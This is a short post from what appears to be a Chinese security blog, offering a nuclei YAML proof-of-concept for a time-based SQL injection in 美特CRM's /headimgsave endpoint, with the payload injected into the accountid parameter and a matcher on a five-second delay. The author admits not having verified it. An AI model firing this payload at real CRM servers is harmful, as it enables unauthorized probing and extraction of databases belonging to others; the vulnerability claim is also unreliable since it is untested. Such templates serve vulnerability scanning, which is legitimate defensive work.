【2025特殊通用】美特CRM headimgsave sqli

【2025特殊通用】美特CRM headimgsave sqli_秃兔安全
【2025特殊通用】美特CRM headimgsave sqli
此内容为付费阅读,请付费后查看
500积分
付费阅读

fofa语句

poc

yaml

id: meite_crm_headimgsave_sqli

info:
  name: 美特CRM headimgsave SQL注入漏洞
  author: dreamer292 from 秃兔安全_tutusec.com
  severity: high


http:
  - raw:
      - |
        GET /headimgsave?accountid=1'+AND+(SELECT+*+FROM+(SELECT+SLEEP(5))x)--+ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Connection: close

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "duration >= 5"

懒得验证了

 

© 版权声明
THE END
喜欢就支持一下吧
点赞13 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容